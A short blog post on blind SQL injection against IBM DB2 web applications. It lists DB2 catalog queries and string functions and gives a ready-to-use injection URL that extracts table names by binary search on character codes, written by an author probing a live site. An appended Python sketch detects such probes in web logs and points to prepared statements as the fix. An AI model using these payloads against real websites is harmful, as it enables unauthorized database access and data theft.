Relatively few people use DB2. Today I came across a DB2-backed website with an injection point and wanted to try it. However, it is difficult to find relevant information on the Internet, so I had to study it myself.
I have summarized the following points by referring to the IBM DB2 documentation:
1. select NAME from SYSIBM.SYSTABLES where CREATOR = USER
Returns the names of all tables in the system that were created by the user.
2. select NAME from SYSIBM.SYSCOLUMNS where TBCREATOR = '' and TBNAME = ''
Returns the column names in the table.
3. select NAME from SYSIBM.SYSTABLES where CREATOR = USER fetch first 1 rows only
This is the most critical part. Only the first record is returned, similar to TOP 1 in SQL Server.
4. SUBSTR (string, position, length)
Returns a substring of a string, similar to MID.
5. ASCII.
With these statements and functions, we can easily guess all the table names, field names, and data using the ASCII halving (binary search) method.
For example, to determine whether the ASCII code of the first character of the name of the first table is greater than 50:
http://*.com/test.jsp?id=1 and (select ASCII(SUBSTR(NAME,1,1)) from SYSIBM.SYSTABLES where CREATOR = USER fetch first 1 rows only) > 50 --
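Seen from the defending side, the halving method above leaves a recognisable trail in web logs: many requests that differ only in the compared number. The following detection sketch is an added example, not part of the original post; the log layout, client addresses and function names are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# Patterns taken from the statements listed in this post.
SIGNATURES = {
    "db2_catalog": re.compile(r"\bsysibm\s*\.\s*sys(?:tables|columns)\b"),
    "char_compare": re.compile(r"\bascii\s*\(\s*substr\s*\("),
    "fetch_first": re.compile(r"\bfetch\s+first\s+\d+\s+rows?\s+only\b"),
}

# Constructed sample log (client, request URL); not real traffic.
PROBE = (
    "/test.jsp?id=1+and+(select+ASCII(SUBSTR(NAME,1,1))+from+SYSIBM.SYSTABLES"
    "+where+CREATOR=USER+fetch+first+1+rows+only)%3E{}+--"
)
SAMPLE_LOG = [
    ("198.51.100.4", "/test.jsp?id=1"),
    ("198.51.100.4", "/search.jsp?q=ascii+table+substr"),
] + [("203.0.113.7", PROBE.format(n)) for n in (50, 75, 62, 68)]

def normalize(url):
    """URL-decode the query string, lowercase it and collapse whitespace."""
    query = unquote_plus(urlsplit(url).query)
    return re.sub(r"\s+", " ", query).strip().lower()

def matched_signatures(url):
    """Names of the DB2 probe patterns present in the request's query string."""
    query = normalize(url)
    return {name for name, rx in SIGNATURES.items() if rx.search(query)}

def find_halving_runs(log, min_probes=3):
    """List (client, path, thresholds) where one client repeats the same
    catalog probe and changes only the number it compares against."""
    runs = defaultdict(set)
    for client, url in log:
        if len(matched_signatures(url)) < 2:
            continue  # a single keyword alone is too weak a signal
        query = normalize(url)
        m = re.search(r"[<>=]\s*(\d+)\s*(?:--)?\s*$", query)
        if m:
            template = re.sub(r"\d+", "N", query)  # same probe, numbers masked
            runs[(client, urlsplit(url).path, template)].add(int(m.group(1)))
    return sorted((client, path, sorted(vals))
                  for (client, path, _), vals in runs.items()
                  if len(vals) >= min_probes)

if __name__ == "__main__":
    print(find_halving_runs(SAMPLE_LOG))
```

Detection of this kind complements, and does not replace, binding the id parameter through a prepared statement in the JSP so that it is never concatenated into the SQL text.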
http://blog.waynedeng.com/blogview.asp?LogID=543